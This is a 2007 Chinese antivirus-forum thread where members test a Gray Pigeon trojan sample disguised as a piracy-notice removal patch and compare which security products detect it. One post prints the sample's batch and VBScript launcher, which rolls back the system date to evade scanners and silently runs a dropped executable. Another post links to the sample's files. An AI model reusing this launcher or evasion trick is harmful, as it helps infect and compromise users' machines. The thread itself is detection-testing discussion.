楼主: lsyer
收起左侧

转FF一个鸽子E1B5D1

[复制链接]
微点卫士
发表于 2007-7-29 22:06:59 | 显示全部楼层
金山挂,费尔扫描挂

微点挂,而且没有拦截衍生物
asdff
发表于 2007-7-29 22:10:02 | 显示全部楼层
我刚才实机测试了下,忘了截图.红伞是过了,
不过zA防火墙还是不错的,全部拦截了.
runsisi
发表于 2007-7-29 22:14:13 | 显示全部楼层
set date=%date%
date 1985-10-24
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > bksy.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo bksy.vbs
goto Timeout
goto End
:Next
%systemroot%/temp/55.exe
date %date%
date 2007-06-12
del bksy.vbs


Set myshell = CreateObject("Wscript.Shell")
myshell.run "cmd /c s.bat",vbhide
promised
发表于 2007-7-29 22:15:03 | 显示全部楼层
鸽子就在下面不远处
微点卫士
发表于 2007-7-29 22:21:31 | 显示全部楼层
原帖由 promised 于 2007-7-29 22:15 发表
鸽子就在下面不远处

where's the gray pegion?
下面是哪个下面
lsyer
 楼主| 发表于 2007-7-29 22:49:23 | 显示全部楼层
原帖由 微点卫士 于 2007-7-29 22:21 发表

where's the gray pegion?
下面是哪个下面

你JM兄弟的。。。。


比较丰富
衍生物1.74M
http://www.duote.net/4B68B073E989588C
[ 本帖最后由 野马 于 2007-7-29 22:39 编辑 ]


附件
2007-7-29 22:28

4.jpg (41.45 KB)
  


2007-7-29 22:28

5.jpg (34.8 KB)
  

傻猪猪米走鸡
发表于 2007-7-29 23:07:32 | 显示全部楼层
上报nod
运指如飞
发表于 2007-7-29 23:11:25 | 显示全部楼层
哇哦~过了好多的杀软
hj5abc
发表于 2007-7-29 23:11:45 | 显示全部楼层
运行后nod32只报了那个bat.

2007-7-29 23:05:33 AMON file C:\fslrdr\1\[_B_]WINDIR[_E_]\Temp\s.bat BAT/Agent.Y trojan quarantined - deleted  Event occurred on a new file created by the application: F:\去除微软盗版通知补丁[1]\去除微软盗版通知补丁.exe. The file was moved to quarantine. You may close this window.
tracydk
发表于 2007-7-29 23:39:37 | 显示全部楼层
又是假的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-9 23:07 , Processed in 0.094881 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表